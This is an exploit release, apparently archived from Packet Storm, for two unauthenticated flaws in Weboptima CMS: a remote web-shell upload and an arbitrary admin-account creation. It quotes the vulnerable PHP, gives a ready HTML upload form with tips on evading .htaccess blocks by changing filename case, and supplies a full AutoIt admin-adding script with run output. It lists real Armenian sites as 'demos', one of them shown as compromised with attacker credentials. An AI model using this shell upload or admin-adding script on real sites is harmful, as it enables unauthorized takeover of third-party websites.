Weboptima CMS suffers from add administrator and remote shell upload vulnerabilities.
fc99f270ff007095d824949c224a7ce7178b34040bce8b1aaa503770f5db42fc#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
weboptima_cms_remote_add_admin_shell_upload.au3
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both Exploits are available(HTML exploit to upload shell)
And Autoit Exploit to add arbitrary admin accounts to target site.
More detailts below.
============================================
Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/
============================================
About Vulns:
1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:
//cms/upload.php
=============SNIP BEGINS======================
<?php
$path="../uploades";
if(!file_exists($path))
{
mkdir($path, 0777);
}
if(isset($_GET['name']))
{
unlink($path."/".$_GET['name']);
$letter = $_GET['letter'];
$selTypey = $_GET['selType'];
header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
<?php
if(isset($_POST['sub']))
{
$fileName = $_FILES["up_file"]['name'];
$masSimbl = array('&','%','#');
if(in_array($fileName[0], $masSimbl))
{
echo $fileName[0].' սիմվոլով սկսվող անուն չընտրել';
}
else
{
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
}
}
?>
========================SNIP ENDS=================
Simple HTML exploit to upload your shell:
<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file" name="up_file" /> <input type="submit" class="button" name="sub" value="send"></form>
After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php
NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
This is not problem just upload your shell like:
myshell.PhP
or
myshell.pHp
OWNED.
2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit;*Script continues it's execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");
$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============
And here is exploit written in Autoit to exploit
this vulnerability and add admin to target site.
Exploit usage(CLI):
weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere
##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld username password
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################
##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Yaaaaa We are Going To Travel xD [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################
#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf
if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')
priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#
Func priv8($targetsite,$username,$password,$count,$error)
$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;
Global $sAddress = $targetsite
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";
if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
EndIf
exit;
EndIf
Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;
Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
EndIf
EndFunc;=> priv8();
#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed